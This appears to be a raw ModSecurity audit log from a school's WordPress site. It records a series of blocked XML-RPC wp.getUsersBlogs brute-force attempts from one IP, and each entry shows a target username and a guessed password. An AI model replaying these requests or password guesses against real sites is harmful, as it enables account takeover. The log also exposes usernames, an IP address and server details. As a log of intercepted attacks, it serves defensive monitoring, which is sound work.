"/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864163896321 6006 (- - -) Stopwatch2: 1749864163896321 6006; combined=4139, p1=527, p2=3419, p3=0, p4=0, p5=113, sr=94, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fb81c52-Z-- --05c2e24e-A-- [14/Jun/2025:08:23:43 +0700] aEzPH0MWfhkd5Y0sFtrpCwAAAIE 103.236.140.4 59180 103.236.140.4 8181 --05c2e24e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --05c2e24e-C-- wp.getUsersBlogs wakakur zzzzz --05c2e24e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05c2e24e-E-- --05c2e24e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (59+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864223548366 5405 (- - -) Stopwatch2: 1749864223548366 5405; combined=3744, p1=450, p2=3098, p3=0, p4=0, p5=114, sr=100, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05c2e24e-Z-- --2744983d-A-- [14/Jun/2025:08:24:44 +0700] aEzPXGmwZ6YUkjOdtI7B6AAAAAo 103.236.140.4 59324 103.236.140.4 8181 --2744983d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2744983d-C-- wp.getUsersBlogs wakakur abcd36888 --2744983d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2744983d-E-- --2744983d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (70+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864284009945 6654 (- - -) Stopwatch2: 1749864284009945 6654; combined=4616, p1=571, p2=3792, p3=0, p4=0, p5=143, sr=134, sw=110, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2744983d-Z-- --347e070f-A-- [14/Jun/2025:08:25:44 +0700] aEzPmGIDXuKmWNi2UBSz9gAAAEk 103.236.140.4 59454 103.236.140.4 8181 --347e070f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --347e070f-C-- wp.getUsersBlogs wakakur andrew --347e070f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --347e070f-E-- --347e070f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (64+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864344323400 5008 (- - -) Stopwatch2: 1749864344323400 5008; combined=3563, p1=429, p2=2948, p3=0, p4=0, p5=108, sr=89, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --347e070f-Z-- --5d6ea20e-A-- [14/Jun/2025:08:26:50 +0700] aEzP2mIDXuKmWNi2UBS0AgAAAFQ 103.236.140.4 59642 103.236.140.4 8181 --5d6ea20e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5d6ea20e-C-- wp.getUsersBlogs wakakur blink182 --5d6ea20e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d6ea20e-E-- --5d6ea20e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (92+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864410103589 32739 (- - -) Stopwatch2: 1749864410103589 32739; combined=58677, p1=470, p2=3042, p3=0, p4=0, p5=27597, sr=98, sw=79, l=0, gc=27489 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d6ea20e-Z-- --2389d36c-A-- [14/Jun/2025:08:27:50 +0700] aEzQFmmwZ6YUkjOdtI7CQgAAAAE 103.236.140.4 59766 103.236.140.4 8181 --2389d36c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2389d36c-C-- wp.getUsersBlogs wakakur jesus1 --2389d36c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2389d36c-E-- --2389d36c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (57+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864470132144 3990 (- - -) Stopwatch2: 1749864470132144 3990; combined=3055, p1=385, p2=2504, p3=0, p4=0, p5=95, sr=84, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2389d36c-Z-- --c924e175-A-- [14/Jun/2025:08:28:51 +0700] aEzQU2mwZ6YUkjOdtI7CYAAAAAw 103.236.140.4 59952 103.236.140.4 8181 --c924e175-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c924e175-C-- wp.getUsersBlogs wakakur bonnie --c924e175-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c924e175-E-- --c924e175-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (90+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864531064757 4195 (- - -) Stopwatch2: 1749864531064757 4195; combined=3241, p1=344, p2=2731, p3=0, p4=0, p5=96, sr=80, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c924e175-Z-- --617efe69-A-- [14/Jun/2025:08:29:51 +0700] aEzQj2mwZ6YUkjOdtI7CfwAAABM 103.236.140.4 60074 103.236.140.4 8181 --617efe69-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --617efe69-C-- wp.getUsersBlogs wakakur Status --617efe69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --617efe69-E-- --617efe69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (57+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864591499502 4274 (- - -) Stopwatch2: 1749864591499502 4274; combined=3237, p1=360, p2=2710, p3=0, p4=0, p5=97, sr=81, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --617efe69-Z-- --85d36e65-A-- [14/Jun/2025:08:30:55 +0700] aEzQz2IDXuKmWNi2UBS0MQAAAFM 103.236.140.4 60186 103.236.140.4 8181 --85d36e65-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --85d36e65-C-- wp.getUsersBlogs wakahumas abcd1234 --85d36e65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85d36e65-E-- --85d36e65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (52+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864655045873 6159 (- - -) Stopwatch2: 1749864655045873 6159; combined=4276, p1=557, p2=3529, p3=0, p4=0, p5=111, sr=117, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85d36e65-Z-- --7026c674-A-- [14/Jun/2025:08:32:02 +0700] aEzREl3g_boun6Rx5jLP5QAAAMI 103.236.140.4 60340 103.236.140.4 8181 --7026c674-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7026c674-C-- wp.getUsersBlogs wakahumas changeme! --7026c674-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7026c674-E-- --7026c674-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (70+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864722641082 6065 (- - -) Stopwatch2: 1749864722641082 6065; combined=4246, p1=570, p2=3487, p3=0, p4=0, p5=111, sr=95, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7026c674-Z-- --e65f5762-A-- [14/Jun/2025:08:33:02 +0700] aEzRTmmwZ6YUkjOdtI7CrQAAABY 103.236.140.4 60508 103.236.140.4 8181 --e65f5762-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e65f5762-C-- wp.getUsersBlogs wakahumas marketing2020_ --e65f5762-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e65f5762-E-- --e65f5762-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (80+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864782839493 5452 (- - -) Stopwatch2: 1749864782839493 5452; combined=3893, p1=464, p2=3242, p3=0, p4=0, p5=109, sr=89, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e65f5762-Z-- --840a2b20-A-- [14/Jun/2025:08:34:03 +0700] aEzRi0MWfhkd5Y0sFtrp3wAAAIE 103.236.140.4 60682 103.236.140.4 8181 --840a2b20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 233 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --840a2b20-C-- wp.getUsersBlogs wakahumas smkn22-jkt-sch-id@ --840a2b20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --840a2b20-E-- --840a2b20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (82+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864843482584 5334 (- - -) Stopwatch2: 1749864843482584 5334; combined=3801, p1=469, p2=3158, p3=0, p4=0, p5=103, sr=90, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --840a2b20-Z-- --c6a65668-A-- [14/Jun/2025:08:35:19 +0700] aEzR113g_boun6Rx5jLQNAAAAMw 103.236.140.4 60850 103.236.140.4 8181 --c6a65668-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c6a65668-C-- wp.getUsersBlogs wakahumas admin@888 --c6a65668-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6a65668-E-- --c6a65668-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (79+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864919232099 5233 (- - -) Stopwatch2: 1749864919232099 5233; combined=3797, p1=457, p2=3161, p3=0, p4=0, p5=105, sr=83, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6a65668-Z-- --36dad025-A-- [14/Jun/2025:08:36:19 +0700] aEzSE2IDXuKmWNi2UBS0ZQAAAEA 103.236.140.4 32828 103.236.140.4 8181 --36dad025-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --36dad025-C-- wp.getUsersBlogs wakahumas nobody --36dad025-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36dad025-E-- --36dad025-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (100+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864979273368 4715 (- - -) Stopwatch2: 1749864979273368 4715; combined=3358, p1=395, p2=2807, p3=0, p4=0, p5=92, sr=88, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36dad025-Z-- --37fad776-A-- [14/Jun/2025:08:37:19 +0700] aEzST2mwZ6YUkjOdtI7C0AAAAA4 103.236.140.4 32984 103.236.140.4 8181 --37fad776-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --37fad776-C-- wp.getUsersBlogs wakahumas secret --37fad776-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37fad776-E-- --37fad776-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (76+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865039201431 4816 (- - -) Stopwatch2: 1749865039201431 4816; combined=3548, p1=397, p2=2964, p3=0, p4=0, p5=108, sr=81, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37fad776-Z-- --d36e8367-A-- [14/Jun/2025:08:38:30 +0700] aEzSlkMWfhkd5Y0sFtrqGQAAAIo 103.236.140.4 33032 103.236.140.4 8181 --d36e8367-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d36e8367-C-- wp.getUsersBlogs wakahumas 123000 --d36e8367-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d36e8367-E-- --d36e8367-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865110477214 31763 (- - -) Stopwatch2: 1749865110477214 31763; combined=56575, p1=467, p2=3045, p3=0, p4=0, p5=26546, sr=98, sw=71, l=0, gc=26446 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d36e8367-Z-- --f95d1270-A-- [14/Jun/2025:08:38:40 +0700] aEzSoEMWfhkd5Y0sFtrqLQAAAIc 103.236.140.4 33072 103.236.140.4 8181 --f95d1270-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: 